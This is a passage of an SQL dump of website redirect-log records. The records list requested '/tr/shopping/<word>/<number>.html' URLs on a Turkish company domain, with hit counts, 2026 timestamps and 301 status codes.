00:00:00',301),(68345,'http://3s-technologies.com.tr/tr/shopping/distream/1507362132.html',NULL,'','',1,0,'2026-06-11 00:06:48','0000-00-00 00:00:00',301),(68346,'http://3s-technologies.com.tr/tr/shopping/gladful/923166125.html',NULL,'','',1,0,'2026-06-11 00:06:51','0000-00-00 00:00:00',301),(68347,'http://3s-technologies.com.tr/tr/shopping/fitly/3710121141.html',NULL,'','',1,0,'2026-06-11 00:06:54','0000-00-00 00:00:00',301),(68348,'https://3s-technologies.com.tr/tr/shopping/wineglassfuls/3747599945.html',NULL,'https://3s-technologies.com.tr/shopping/wineglassfuls/3747599945.html','',1,0,'2026-06-11 00:07:55','0000-00-00 00:00:00',301),(68349,'http://3s-technologies.com.tr/tr/shopping/akene/3613939549.html',NULL,'','',2,0,'2026-06-11 00:08:46','0000-00-00 00:00:00',301),(68350,'http://3s-technologies.com.tr/tr/shopping/requisitor/4077750198.html',NULL,'','',1,0,'2026-06-11 00:08:50','0000-00-00 00:00:00',301),(68351,'http://3s-technologies.com.tr/tr/shopping/abstracter/2426735595.html',NULL,'','',1,0,'2026-06-11 00:08:56','0000-00-00 00:00:00',301),(68352,'https://3s-technologies.com.tr/tr/shopping/glandulous/3145821641.html',NULL,'https://3s-technologies.com.tr/shopping/glandulous/3145821641.html','',1,0,'2026-06-11 00:09:00','0000-00-00 00:00:00',301),(68353,'http://3s-technologies.com.tr/tr/shopping/bergmaster/2849312184.html',NULL,'','',2,0,'2026-06-11 00:09:00','0000-00-00 00:00:00',301),(68354,'http://3s-technologies.com.tr/tr/shopping/pulsatile/1869840660.html',NULL,'','',1,0,'2026-06-11 00:09:04','0000-00-00 00:00:00',301),(68355,'http://3s-technologies.com.tr/tr/shopping/suent/407391636.html',NULL,'','',2,0,'2026-06-11 00:09:06','0000-00-00 00:00:00',301),(68356,'https://3s-technologies.com.tr/tr/shopping/campestre/682472339.html',NULL,'https://3s-technologies.com.tr/shopping/campestre/682472339.html','',1,0,'2026-06-11 00:09:07','0000-00-00 00:00:00',301),(68357,'https://3s-technologies.com.tr/tr/shopping/doxologized/1037306893.html',NULL,'https://3s-technologies.com.tr/shopping/doxologized/1037306893.html','',1,0,'2026-06-11 00:09:10','0000-00-00 00:00:00',301),(68358,'http://3s-technologies.com.tr/tr/shopping/support/2650169552.html',NULL,'','',1,0,'2026-06-11 00:11:00','0000-00-00 00:00:00',301),(68359,'https://3s-technologies.com.tr/tr/shopping/relay/2779110895.html',NULL,'https://3s-technologies.com.tr/shopping/relay/2779110895.html','',1,0,'2026-06-11 00:11:01','0000-00-00 00:00:00',301),(68360,'http://3s-technologies.com.tr/tr/shopping/foeticide/3553632541.html',NULL,'','',2,0,'2026-06-11 00:11:03','0000-00-00 00:00:00',301),(68361,'https://3s-technologies.com.tr/tr/shopping/attack/2714101914.html',NULL,'https://3s-technologies.com.tr/shopping/attack/2714101914.html','',1,0,'2026-06-11 00:11:04','0000-00-00 00:00:00',301),(68362,'https://3s-technologies.com.tr/tr/shopping/trajecting/1161939628.html',NULL,'https://3s-technologies.com.tr/shopping/trajecting/1161939628.html','',1,0,'2026-06-11 00:11:07','0000-00-00 00:00:00',301),(68363,'http://3s-technologies.com.tr/tr/shopping/melliloquent/3425165023.html',NULL,'','',2,0,'2026-06-11 00:11:07','0000-00-00 00:00:00',301),(68364,'https://3s-technologies.com.tr/tr/shopping/alaternus/4040768998.html',NULL,'https://3s-technologies.com.tr/shopping/alaternus/4040768998.html','',1,0,'2026-06-11 00:11:10','0000-00-00 00:00:00',301),(68365,'http://3s-technologies.com.tr/tr/shopping/bleakish/2448072288.html',NULL,'','',1,0,'2026-06-11 00:11:11','0000-00-00 00:00:00',301),(68366,'http://3s-technologies.com.tr/tr/shopping/microspore/1143577261.html',NULL,'','',2,0,'2026-06-11 00:11:13','0000-00-00 00:00:00',301),(68367,'https://3s-technologies.com.tr/tr/shopping/sharpcut/1752314705.html',NULL,'https://3s-technologies.com.tr/shopping/sharpcut/1752314705.html','',1,0,'2026-06-11 00:11:13','0000-00-00 00:00:00',301),(68368,'https://3s-technologies.com.tr/tr/shopping/stackage/125307487.html',NULL,'https://3s-technologies.com.tr/shopping/stackage/125307487.html','',1,0,'2026-06-11 00:11:16','0000-00-00 00:00:00',301),(68369,'http://3s-technologies.com.tr/tr/shopping/parorchis/2573114639.html',NULL,'','',2,0,'2026-06-11 00:11:16','0000-00-00 00:00:00',301),(68370,'https://3s-technologies.com.tr/tr/shopping/dimetric/793920249.html',NULL,'https://3s-technologies.com.tr/shopping/dimetric/793920249.html','',1,0,'2026-06-11 00:11:19','0000-00-00 00:00:00',301),(68371,'https://3s-technologies.com.tr/tr/shopping/spawning/4131542684.html',NULL,'https://3s-technologies.com.tr/shopping/spawning/4131542684.html','',1,0,'2026-06-11 00:11:22','0000-00-00 00:00:00',301),(68372,'https://3s-technologies.com.tr/tr/shopping/firststring/3692659601.html',NULL,'https://3s-technologies.com.tr/shopping/firststring/3692659601.html','',1,0,'2026-06-11 00:11:25','0000-00-00 00:00:00',301),(68373,'https://3s-technologies.com.tr/tr/shopping/simulated/4100240643.html',NULL,'https://3s-technologies.com.tr/shopping/simulated/4100240643.html','',1,0,'2026-06-11 00:11:28','0000-00-00 00:00:00',301),(68374,'https://3s-technologies.com.tr/tr/shopping/decrease/2045349485.html',NULL,'https://3s-technologies.com.tr/shopping/decrease/2045349485.html','',1,0,'2026-06-11 00:11:31','0000-00-00 00:00:00',301),(68375,'https://3s-technologies.com.tr/tr/shopping/validly/3856909319.html',NULL,'https://3s-technologies.com.tr/shopping/validly/3856909319.html','',1,0,'2026-06-11 00:11:43','0000-00-00 00:00:00',301),(68376,'https://3s-technologies.com.tr/tr/shopping/subscriptive/2430774255.html',NULL,'https://3s-technologies.com.tr/shopping/subscriptive/2430774255.html','',1,0,'2026-06-11 00:11:45','0000-00-00 00:00:00',301),(68377,'https://3s-technologies.com.tr/tr/shopping/constructure/203365568.html',NULL,'https://3s-technologies.com.tr/shopping/constructure/203365568.html','',1,0,'2026-06-11 00:11:48','0000-00-00 00:00:00',301),(68378,'https://3s-technologies.com.tr/tr/shopping/codifying/1609564184.html',NULL,'https://3s-technologies.com.tr/shopping/codifying/1609564184.html','',1,0,'2026-06-11 00:11:51','0000-00-00 00:00:00',301),(68379,'https://3s-technologies.com.tr/tr/shopping/checkstring/1741383768.html',NULL,'https://3s-technologies.com.tr/shopping/checkstring/1741383768.html','',1,0,'2026-06-11 00:11:54','0000-00-00 00:00:00',301),(68380,'https://3s-technologies.com.tr/tr/shopping/seconding/1301288586.html',NULL,'https://3s-technologies.com.tr/shopping/seconding/1301288586.html','',1,0,'2026-06-11 00:11:58','0000-00-00 00:00:00',301),(68381,'https://3s-technologies.com.tr/tr/shopping/compression/2290032575.html',NULL,'https://3s-technologies.com.tr/shopping/compression/2290032575.html','',1,0,'2026-06-11 00:12:00','0000-00-00 00:00:00',301),(68382,'https://3s-technologies.com.tr/tr/shopping/wrong/635936700.html',NULL,'https://3s-technologies.com.tr/shopping/wrong/635936700.html','',1,0,'2026-06-11 00:12:03','0000-00-00 00:00:00',301),(68383,'https://3s-technologies.com.tr/tr/shopping/simulation/1592979802.html',NULL,'https://3s-technologies.com.tr/shopping/simulation/1592979802.html','',1,0,'2026-06-11 00:12:06','0000-00-00 00:00:00',301),(68384,'https://3s-technologies.com.tr/tr/shopping/emblematically/764519263.html',NULL,'https://3s-technologies.com.tr/shopping/emblematically/764519263.html','',1,0,'2026-06-11 00:12:10','0000-00-00 00:00:00',301),(68385,'https://3s-technologies.com.tr/tr/shopping/processes/850573003.html',NULL,'https://3s-technologies.com.tr/shopping/processes/850573003.html','',1,0,'2026-06-11 00:12:12','0000-00-00 00:00:00',301),(68386,'https://3s-technologies.com.tr/tr/shopping/effectuating/256544545.html',NULL,'https://3s-technologies.com.tr/shopping/effectuating/256544545.html','',1,0,'2026-06-11 00:12:19','0000-00-00 00:00:00',301),(68387,'https://3s-technologies.com.tr/tr/shopping/diffinitive/1245552070.html',NULL,'https://3s-technologies.com.tr/shopping/diffinitive/1245552070.html','',1,0,'2026-06-11 00:12:23','0000-00-00 00:00:00',301),(68388,'https://3s-technologies.com.tr/tr/shopping/decayed/2370581289.html',NULL,'https://3s-technologies.com.tr/shopping/decayed/2370581289.html','',1,0,'2026-06-11 00:12:26','0000-00-00 00:00:00',301),(68389,'https://3s-technologies.com.tr/tr/shopping/secularization/1855083969.html',NULL,'https://3s-technologies.com.tr/shopping/secularization/1855083969.html','',1,0,'2026-06-11 00:12:29','0000-00-00 00:00:00',301),(68390,'https://3s-technologies.com.tr/tr/shopping/confounding/2010917281.html',NULL,'https://3s-technologies.com.tr/shopping/confounding/2010917281.html','',1,0,'2026-06-11 00:12:37','0000-00-00 00:00:00',301),(68391,'https://3s-technologies.com.tr/tr/shopping/classicist/993462189.html',NULL,'https://3s-technologies.com.tr/shopping/classicist/993462189.html','',1,0,'2026-06-11 00:12:38','0000-00-00 00:00:00',301),(68392,'https://3s-technologies.com.tr/tr/shopping/pouncing/470738434.html',NULL,'https://3s-technologies.com.tr/shopping/pouncing/470738434.html','',1,0,'2026-06-11 00:12:41','0000-00-00 00:00:00',301),(68393,'https://3s-technologies.com.tr/tr/shopping/overflutter/671256704.html',NULL,'https://3s-technologies.com.tr/shopping/overflutter/671256704.html','',1,0,'2026-06-11 00:12:44','0000-00-00 00:00:00',301),(68394,'https://3s-technologies.com.tr/tr/shopping/buffing/3595806137.html',NULL,'https://3s-technologies.com.tr/shopping/buffing/3595806137.html','',1,0,'2026-06-11 00:12:47','0000-00-00 00:00:00',301),(68395,'https://3s-technologies.com.tr/tr/shopping/declinatory/1987302829.html',NULL,'https://3s-technologies.com.tr/shopping/declinatory/1987302829.html','',1,0,'2026-06-11 00:12:50','0000-00-00 00:00:00',301),(68396,'https://3s-technologies.com.tr/tr/shopping/nonintersecting/991151144.html',NULL,'https://3s-technologies.com.tr/shopping/nonintersecting/991151144.html','',1,0,'2026-06-11 00:12:53','0000-00-00 00:00:00',301),(68397,'https://3s-technologies.com.tr/tr/shopping/devitrify/2469629509.html',NULL,'https://3s-technologies.com.tr/shopping/devitrify/2469629509.html','',1,0,'2026-06-11 00:12:56','0000-00-00 00:00:00',301),(68398,'https://3s-technologies.com.tr/tr/shopping/prescriptivist/3340428881.html',NULL,'https://3s-technologies.com.tr/shopping/prescriptivist/3340428881.html','',1,0,'2026-06-11 00:12:59','0000-00-00 00:00:00',301),(68399,'https://3s-technologies.com.tr/tr/shopping/cardinalize/3791619703.html',NULL,'https://3s-technologies.com.tr/shopping/cardinalize/3791619703.html','',1,0,'2026-06-11 00:13:02','0000-00-00 00:00:00',301),(68400,'https://3s-technologies.com.tr/tr/shopping/incursion/3794668134.html',NULL,'https://3s-technologies.com.tr/shopping/incursion/3794668134.html','',1,0,'2026-06-11 00:13:05','0000-00-00 00:00:00',301),(68401,'http://3s-technologies.com.tr/tr/shopping/vowfellow/1206097321.html',NULL,'','',1,0,'2026-06-11 00:13:10','0000-00-00 00:00:00',301),(68402,'https://3s-technologies.com.tr/tr/shopping/separatory/1277787303.html',NULL,'https://3s-technologies.com.tr/shopping/separatory/1277787303.html','',1,0,'2026-06-11 00:13:11','0000-00-00 00:00:00',301),(68403,'https://3s-technologies.com.tr/tr/shopping/empty/2391589740.html',NULL,'https://3s-technologies.com.tr/shopping/empty/2391589740.html','',1,0,'2026-06-11 00:13:15','0000-00-00 00:00:00',301),(68404,'http://3s-technologies.com.tr/tr/shopping/kopeck/2152562956.html',NULL,'','',1,0,'2026-06-11 00:13:15','0000-00-00 00:00:00',301),(68405,'http://3s-technologies.com.tr/tr/shopping/arthropomata/651581191.html',NULL,'','',1,0,'2026-06-11 00:13:17','0000-00-00 00:00:00',301),(68406,'https://3s-technologies.com.tr/tr/shopping/halberd/48252574.html',NULL,'https://3s-technologies.com.tr/shopping/halberd/48252574.html','',1,0,'2026-06-11 00:13:18','0000-00-00 00:00:00',301),(68407,'http://3s-technologies.com.tr/tr/shopping/zanyism/2473719849.html',NULL,'','',1,0,'2026-06-11 00:13:21','0000-00-00 00:00:00',301),(68408,'https://3s-technologies.com.tr/tr/shopping/rectovesical/8725448.html',NULL,'https://3s-technologies.com.tr/shopping/rectovesical/8725448.html','',1,0,'2026-06-11 00:13:21','0000-00-00 00:00:00',301),(68409,'https://3s-technologies.com.tr/tr/shopping/selfknowing/3764482139.html',NULL,'https://3s-technologies.com.tr/shopping/selfknowing/3764482139.html','',1,0,'2026-06-11 00:13:24','0000-00-00 00:00:00',301),(68410,'http://3s-technologies.com.tr/tr/shopping/hevea/1914451425.html',NULL,'','',2,0,'2026-06-11 00:13:24','0000-00-00 00:00:00',301),(68411,'https://3s-technologies.com.tr/tr/shopping/juncus/3549429016.html',NULL,'https://3s-technologies.com.tr/shopping/juncus/3549429016.html','',1,0,'2026-06-11 00:13:27','0000-00-00 00:00:00',301),(68412,'http://3s-technologies.com.tr/tr/shopping/quaff/2665100392.html',NULL,'','',2,0,'2026-06-11 00:13:28','0000-00-00 00:00:00',301),(68413,'https://3s-technologies.com.tr/tr/shopping/bedpost/2125716396.html',NULL,'https://3s-technologies.com.tr/shopping/bedpost/2125716396.html','',1,0,'2026-06-11 00:13:30','0000-00-00 00:00:00',301),(68414,'https://3s-technologies.com.tr/tr/shopping/indefectibility/1479770525.html',NULL,'https://3s-technologies.com.tr/shopping/indefectibility/1479770525.html','',1,0,'2026-06-11 00:13:33','0000-00-00 00:00:00',301),(68415,'https://3s-technologies.com.tr/tr/shopping/offence/1716670402.html',NULL,'https://3s-technologies.com.tr/shopping/offence/1716670402.html','',1,0,'2026-06-11 00:13:36','0000-00-00 00:00:00',301),(68416,'https://3s-technologies.com.tr/tr/shopping/allying/675845476.html',NULL,'https://3s-technologies.com.tr/shopping/allying/675845476.html','',1,0,'2026-06-11 00:13:39','0000-00-00 00:00:00',301),(68417,'https://3s-technologies.com.tr/tr/shopping/disunity/68868933.html',NULL,'https://3s-technologies.com.tr/shopping/disunity/68868933.html','',1,0,'2026-06-11 00:13:42','0000-00-00 00:00:00',301),(68418,'https://3s-technologies.com.tr/tr/shopping/halffaced/2635412845.html',NULL,'https://3s-technologies.com.tr/shopping/halffaced/2635412845.html','',1,0,'2026-06-11 00:13:47','0000-00-00 00:00:00',301),(68419,'https://3s-technologies.com.tr/tr/shopping/batable/4014842546.html',NULL,'https://3s-technologies.com.tr/shopping/batable/4014842546.html','',1,0,'2026-06-11 00:13:52','0000-00-00 00:00:00',301),(68420,'https://3s-technologies.com.tr/tr/shopping/knapping/3020018005.html',NULL,'https://3s-technologies.com.tr/shopping/knapping/3020018005.html','',1,0,'2026-06-11 00:13:55','0000-00-00 00:00:00',301),(68421,'https://3s-technologies.com.tr/tr/shopping/phonal/317836409.html',NULL,'https://3s-technologies.com.tr/shopping/phonal/317836409.html','',1,0,'2026-06-11 00:13:58','0000-00-00 00:00:00',301),(68422,'https://3s-technologies.com.tr/tr/shopping/modality/883856812.html',NULL,'https://3s-technologies.com.tr/shopping/modality/883856812.html','',1,0,'2026-06-11 00:14:01','0000-00-00 00:00:00',301),(68423,'https://3s-technologies.com.tr/tr/shopping/interlined/1880846914.html',NULL,'https://3s-technologies.com.tr/shopping/interlined/1880846914.html','',1,0,'2026-06-11 00:14:04','0000-00-00 00:00:00',301),(68424,'https://3s-technologies.com.tr/tr/shopping/puffingly/2162566010.html',NULL,'https://3s-technologies.com.tr/shopping/puffingly/2162566010.html','',1,0,'2026-06-11 00:14:07','0000-00-00 00:00:00',301),(68425,'https://3s-technologies.com.tr/tr/shopping/export/276653042.html',NULL,'https://3s-technologies.com.tr/shopping/export/276653042.html','',1,0,'2026-06-11 00:14:10','0000-00-00 00:00:00',301),(68426,'https://3s-technologies.com.tr/tr/shopping/synoptically/1876043910.html',NULL,'https://3s-technologies.com.tr/shopping/synoptically/1876043910.html','',1,0,'2026-06-11 00:14:13','0000-00-00 00:00:00',301),(68427,'https://3s-technologies.com.tr/tr/shopping/worming/1132015424.html',NULL,'https://3s-technologies.com.tr/shopping/worming/1132015424.html','',1,0,'2026-06-11 00:14:16','0000-00-00 00:00:00',301),(68428,'https://3s-technologies.com.tr/tr/shopping/causeless/2643910.html',NULL,'https://3s-technologies.com.tr/shopping/causeless/2643910.html','',1,0,'2026-06-11 00:14:19','0000-00-00 00:00:00',301),(68429,'https://3s-technologies.com.tr/tr/shopping/libration/3924232399.html',NULL,'https://3s-technologies.com.tr/shopping/libration/3924232399.html','',1,0,'2026-06-11 00:14:29','0000-00-00 00:00:00',301),(68430,'https://3s-technologies.com.tr/tr/shopping/quantity/1675158745.html',NULL,'https://3s-technologies.com.tr/shopping/quantity/1675158745.html','',1,0,'2026-06-11 00:14:31','0000-00-00 00:00:00',301),(68431,'https://3s-technologies.com.tr/tr/shopping/transfer/1828107165.html',NULL,'https://3s-technologies.com.tr/shopping/transfer/1828107165.html','',1,0,'2026-06-11 00:14:34','0000-00-00 00:00:00',301),(68432,'https://3s-technologies.com.tr/tr/shopping/selfregulating/2741074759.html',NULL,'https://3s-technologies.com.tr/shopping/selfregulating/2741074759.html','',1,0,'2026-06-11 00:14:37','0000-00-00 00:00:00',301),(68433,'https://3s-technologies.com.tr/tr/shopping/capitulated/3759729812.html',NULL,'https://3s-technologies.com.tr/shopping/capitulated/3759729812.html','',1,0,'2026-06-11 00:14:40','0000-00-00 00:00:00',301),(68434,'https://3s-technologies.com.tr/tr/shopping/exceedingly/578711393.html',NULL,'https://3s-technologies.com.tr/shopping/exceedingly/578711393.html','',1,0,'2026-06-11 00:14:43','0000-00-00 00:00:00',301),(68435,'https://3s-technologies.com.tr/tr/shopping/exampling/4197800072.html',NULL,'https://3s-technologies.com.tr/shopping/exampling/4197800072.html','',1,0,'2026-06-11 00:14:46','0000-00-00 00:00:00',301),(68436,'https://3s-technologies.com.tr/tr/shopping/captiously/400809337.html',NULL,'https://3s-technologies.com.tr/shopping/captiously/400809337.html','',1,0,'2026-06-11 00:14:49','0000-00-00 00:00:00',301),(68437,'https://3s-technologies.com.tr/tr/shopping/devast/1236162509.html',NULL,'https://3s-technologies.com.tr/shopping/devast/1236162509.html','',1,0,'2026-06-11 00:14:52','0000-00-00 00:00:00',301),(68438,'https://3s-technologies.com.tr/tr/shopping/creolean/2787011681.html',NULL,'https://3s-technologies.com.tr/shopping/creolean/2787011681.html','',1,0,'2026-06-11 00:14:55','0000-00-00 00:00:00',301),(68439,'https://3s-technologies.com.tr/tr/shopping/attacking/4026725942.html',NULL,'https://3s-technologies.com.tr/shopping/attacking/4026725942.html','',1,0,'2026-06-11 00:14:58','0000-00-00 00:00:00',301),(68440,'https://3s-technologies.com.tr/tr/shopping/oenometer/3415880945.html',NULL,'https://3s-technologies.com.tr/shopping/oenometer/3415880945.html','',1,0,'2026-06-11 00:15:03','0000-00-00 00:00:00',301),(68441,'https://3s-technologies.com.tr/tr/shopping/convertibility/3902732167.html',NULL,'https://3s-technologies.com.tr/shopping/convertibility/3902732167.html','',1,0,'2026-06-11 00:15:05','0000-00-00 00:00:00',301),(68442,'https://3s-technologies.com.tr/tr/shopping/tutor/4096700447.html',NULL,'https://3s-technologies.com.tr/shopping/tutor/4096700447.html','',1,0,'2026-06-11 00:15:08','0000-00-00 00:00:00',301),(68443,'https://3s-technologies.com.tr/tr/shopping/refractable/2467041804.html',NULL,'https://3s-technologies.com.tr/shopping/refractable/2467041804.html','',1,0,'2026-06-11 00:15:11','0000-00-00 00:00:00',301),(68444,'https://3s-technologies.com.tr/tr/shopping/abusable/2280477276.html',NULL,'https://3s-technologies.com.tr/shopping/abusable/2280477276.html','',1,0,'2026-06-11 00:15:14','0000-00-00 00:00:00',301),(68445,'https://3s-technologies.com.tr/tr/shopping/physicologic/4240818816.html',NULL,'https://3s-technologies.com.tr/shopping/physicologic/4240818816.html','',1,0,'2026-06-11 00:15:17','0000-00-00 00:00:00',301),(68446,'https://3s-technologies.com.tr/tr/shopping/bethinking/3576958349.html',NULL,'https://3s-technologies.com.tr/shopping/bethinking/3576958349.html','',1,0,'2026-06-11 00:15:20','0000-00-00 00:00:00',301),(68447,'http://3s-technologies.com.tr/tr/shopping/selfdefensive/1285367517.html',NULL,'','',1,0,'2026-06-11 00:15:23','0000-00-00 00:00:00',301),(68448,'https://3s-technologies.com.tr/tr/shopping/dosimeter/3695083783.html',NULL,'https://3s-technologies.com.tr/shopping/dosimeter/3695083783.html','',1,0,'2026-06-11 00:15:23','0000-00-00 00:00:00',301),(68449,'http://3s-technologies.com.tr/tr/shopping/irrorate/1893556159.html',NULL,'','',2,0,'2026-06-11 00:15:26','0000-00-00 00:00:00',301),(68450,'https://3s-technologies.com.tr/tr/shopping/intercommoned/3287348736.html',NULL,'https://3s-technologies.com.tr/shopping/intercommoned/3287348736.html','',1,0,'2026-06-11 00:15:26','0000-00-00 00:00:00',301),(68451,'https://3s-technologies.com.tr/tr/shopping/whatever/210659189.html',NULL,'https://3s-technologies.com.tr/shopping/whatever/210659189.html','',1,0,'2026-06-11 00:15:29','0000-00-00 00:00:00',301),(68452,'http://3s-technologies.com.tr/tr/shopping/biochemistry/853287705.html',NULL,'','',2,0,'2026-06-11 00:15:30','0000-00-00 00:00:00',301),(68453,'https://3s-technologies.com.tr/tr/shopping/capper/3283808524.html',NULL,'https://3s-technologies.com.tr/shopping/capper/3283808524.html','',1,0,'2026-06-11 00:15:32','0000-00-00 00:00:00',301),(68454,'http://3s-technologies.com.tr/tr/shopping/coyly/654957880.html',NULL,'','',2,0,'2026-06-11 00:15:35','0000-00-00 00:00:00',301),(68455,'https://3s-technologies.com.tr/tr/shopping/ethionic/510429067.html',NULL,'https://3s-technologies.com.tr/shopping/ethionic/510429067.html','',1,0,'2026-06-11 00:15:37','0000-00-00 00:00:00',301),(68456,'http://3s-technologies.com.tr/tr/shopping/billingsgate/2810291192.html',NULL,'','',2,0,'2026-06-11 00:15:39','0000-00-00 00:00:00',301),(68457,'https://3s-technologies.com.tr/tr/shopping/gonococcus/1930536033.html',NULL,'https://3s-technologies.com.tr/shopping/gonococcus/1930536033.html','',1,0,'2026-06-11 00:15:40','0000-00-00 00:00:00',301),(68458,'http://3s-technologies.com.tr/tr/shopping/revitalize/3520741681.html',NULL,'','',2,0,'2026-06-11 00:15:43','0000-00-00 00:00:00',301),(68459,'https://3s-technologies.com.tr/tr/shopping/instant/2012016195.html',NULL,'https://3s-technologies.com.tr/shopping/instant/2012016195.html','',1,0,'2026-06-11 00:15:43','0000-00-00 00:00:00',301),(68460,'https://3s-technologies.com.tr/tr/shopping/aflutter/1879634815.html',NULL,'https://3s-technologies.com.tr/shopping/aflutter/1879634815.html','',1,0,'2026-06-11 00:15:46','0000-00-00 00:00:00',301),(68461,'https://3s-technologies.com.tr/tr/shopping/bareback/2931389642.html',NULL,'https://3s-technologies.com.tr/shopping/bareback/2931389642.html','',1,0,'2026-06-11 00:15:48','0000-00-00 00:00:00',301),(68462,'https://3s-technologies.com.tr/tr/shopping/dehorted/3816168366.html',NULL,'https://3s-technologies.com.tr/shopping/dehorted/3816168366.html','',1,0,'2026-06-11 00:15:52','0000-00-00 00:00:00',301),(68463,'https://3s-technologies.com.tr/tr/shopping/cellulated/260067657.html',NULL,'https://3s-technologies.com.tr/shopping/cellulated/260067657.html','',1,0,'2026-06-11 00:15:55','0000-00-00 00:00:00',301),(68464,'https://3s-technologies.com.tr/tr/shopping/ethnically/3736267182.html',NULL,'https://3s-technologies.com.tr/shopping/ethnically/3736267182.html','',1,0,'2026-06-11 00:15:58','0000-00-00 00:00:00',301),(68465,'https://3s-technologies.com.tr/tr/shopping/cuspidate/709571699.html',NULL,'https://3s-technologies.com.tr/shopping/cuspidate/709571699.html','',1,0,'2026-06-11 00:16:01','0000-00-00 00:00:00',301),(68466,'https://3s-technologies.com.tr/tr/shopping/atomistical/330930933.html',NULL,'https://3s-technologies.com.tr/shopping/atomistical/330930933.html','',1,0,'2026-06-11 00:16:03','0000-00-00 00:00:00',301),(68467,'https://3s-technologies.com.tr/tr/shopping/subseptuple/2805135192.html',NULL,'https://3s-technologies.com.tr/shopping/subseptuple/2805135192.html','',1,0,'2026-06-11 00:16:06','0000-00-00 00:00:00',301),(68468,'https://3s-technologies.com.tr/tr/shopping/pompatic/3680712469.html',NULL,'https://3s-technologies.com.tr/shopping/pompatic/3680712469.html','',1,0,'2026-06-11 00:16:16','0000-00-00 00:00:00',301),(68469,'https://3s-technologies.com.tr/tr/shopping/jumpedup/2198997082.html',NULL,'https://3s-technologies.com.tr/shopping/jumpedup/2198997082.html','',1,0,'2026-06-11 00:16:18','0000-00-00 00:00:00',301),(68470,'https://3s-technologies.com.tr/tr/shopping/replyer/1451139192.html',NULL,'https://3s-technologies.com.tr/shopping/replyer/1451139192.html','',1,0,'2026-06-11 00:16:21','0000-00-00 00:00:00',301),(68471,'https://3s-technologies.com.tr/tr/shopping/obliterated/525964857.html',NULL,'https://3s-technologies.com.tr/shopping/obliterated/525964857.html','',1,0,'2026-06-11 00:16:24','0000-00-00 00:00:00',301),(68472,'https://3s-technologies.com.tr/tr/shopping/duressor/869485482.html',NULL,'https://3s-technologies.com.tr/shopping/duressor/869485482.html','',1,0,'2026-06-11 00:16:27','0000-00-00 00:00:00',301),(68473,'https://3s-technologies.com.tr/tr/shopping/corcle/921499983.html',NULL,'https://3s-technologies.com.tr/shopping/corcle/921499983.html','',1,0,'2026-06-11 00:16:30','0000-00-00 00:00:00',301),(68474,'https://3s-technologies.com.tr/tr/shopping/transcendency/1165575909.html',NULL,'https://3s-technologies.com.tr/shopping/transcendency/1165575909.html','',1,0,'2026-06-11 00:16:33','0000-00-00 00:00:00',301),(68475,'https://3s-technologies.com.tr/tr/shopping/ascoma/772533218.html',NULL,'https://3s-technologies.com.tr/shopping/ascoma/772533218.html','',1,0,'2026-06-11 00:16:36','0000-00-00 00:00:00',301),(68476,'https://3s-technologies.com.tr/tr/shopping/undersong/1356892764.html',NULL,'https://3s-technologies.com.tr/shopping/undersong/1356892764.html','',1,0,'2026-06-11 00:16:39','0000-00-00 00:00:00',301),(68477,'https://3s-technologies.com.tr/tr/shopping/qtash/793756726.html',NULL,'https://3s-technologies.com.tr/shopping/qtash/793756726.html','',1,0,'2026-06-11 00:16:42','0000-00-00 00:00:00',301),(68478,'https://3s-technologies.com.tr/tr/shopping/concision/1938614663.html',NULL,'https://3s-technologies.com.tr/shopping/concision/1938614663.html','',1,0,'2026-06-11 00:16:45','0000-00-00 00:00:00',301),(68479,'https://3s-technologies.com.tr/tr/shopping/averred/3963152344.html',NULL,'https://3s-technologies.com.tr/shopping/averred/3963152344.html','',1,0,'2026-06-11 00:16:54','0000-00-00 00:00:00',301),(68480,'https://3s-technologies.com.tr/tr/shopping/interosculate/1019846165.html',NULL,'https://3s-technologies.com.tr/shopping/interosculate/1019846165.html','',1,0,'2026-06-11 00:16:55','0000-00-00 00:00:00',301),(68481,'https://3s-technologies.com.tr/tr/shopping/discurrent/1792235619.html',NULL,'https://3s-technologies.com.tr/shopping/discurrent/1792235619.html','',1,0,'2026-06-11 00:16:59','0000-00-00 00:00:00',301),(68482,'https://3s-technologies.com.tr/tr/shopping/fraternization/920287884.html',NULL,'https://3s-technologies.com.tr/shopping/fraternization/920287884.html','',1,0,'2026-06-11 00:17:02','0000-00-00 00:00:00',301),(68483,'https://3s-technologies.com.tr/tr/shopping/jinks/1209138098.html',NULL,'https://3s-technologies.com.tr/shopping/jinks/1209138098.html','',1,0,'2026-06-11 00:17:04','0000-00-00 00:00:00',301),(68484,'https://3s-technologies.com.tr/tr/shopping/kaolinize/4173381694.html',NULL,'https://3s-technologies.com.tr/shopping/kaolinize/4173381694.html','',1,0,'2026-06-11 00:17:08','0000-00-00 00:00:00',301),(68485,'https://3s-technologies.com.tr/tr/shopping/circassian/3882506558.html',NULL,'https://3s-technologies.com.tr/shopping/circassian/3882506558.html','',1,0,'2026-06-11 00:17:11','0000-00-00 00:00:00',301),(68486,'https://3s-technologies.com.tr/tr/shopping/acnodes/2569024299.html',NULL,'https://3s-technologies.com.tr/shopping/acnodes/2569024299.html','',1,0,'2026-06-11 00:17:14','0000-00-00 00:00:00',301),(68487,'https://3s-technologies.com.tr/tr/shopping/ceriph/67770003.html',NULL,'https://3s-technologies.com.tr/shopping/ceriph/67770003.html','',1,0,'2026-06-11 00:17:17','0000-00-00 00:00:00',301),(68488,'https://3s-technologies.com.tr/tr/shopping/behete/92646924.html',NULL,'https://3s-technologies.com.tr/shopping/behete/92646924.html','',1,0,'2026-06-11 00:17:20','0000-00-00 00:00:00',301),(68489,'https://3s-technologies.com.tr/tr/shopping/cornered/39074982.html',NULL,'https://3s-technologies.com.tr/shopping/cornered/39074982.html','',1,0,'2026-06-11 00:17:23','0000-00-00 00:00:00',301),(68490,'https://3s-technologies.com.tr/tr/shopping/blitzkrieg/3462094543.html',NULL,'https://3s-technologies.com.tr/shopping/blitzkrieg/3462094543.html','',1,0,'2026-06-11 00:17:28','0000-00-00 00:00:00',301),(68491,'https://3s-technologies.com.tr/tr/shopping/nobler/3111101960.html',NULL,'https://3s-technologies.com.tr/shopping/nobler/3111101960.html','',1,0,'2026-06-11 00:17:30','0000-00-00 00:00:00',301),(68492,'https://3s-technologies.com.tr/tr/shopping/podling/2062868062.html',NULL,'https://3s-technologies.com.tr/shopping/podling/2062868062.html','',1,0,'2026-06-11 00:17:33','0000-00-00 00:00:00',301),(68493,'https://3s-technologies.com.tr/tr/shopping/centaur/2742286858.html',NULL,'https://3s-technologies.com.tr/shopping/centaur/2742286858.html','',1,0,'2026-06-11 00:17:36','0000-00-00 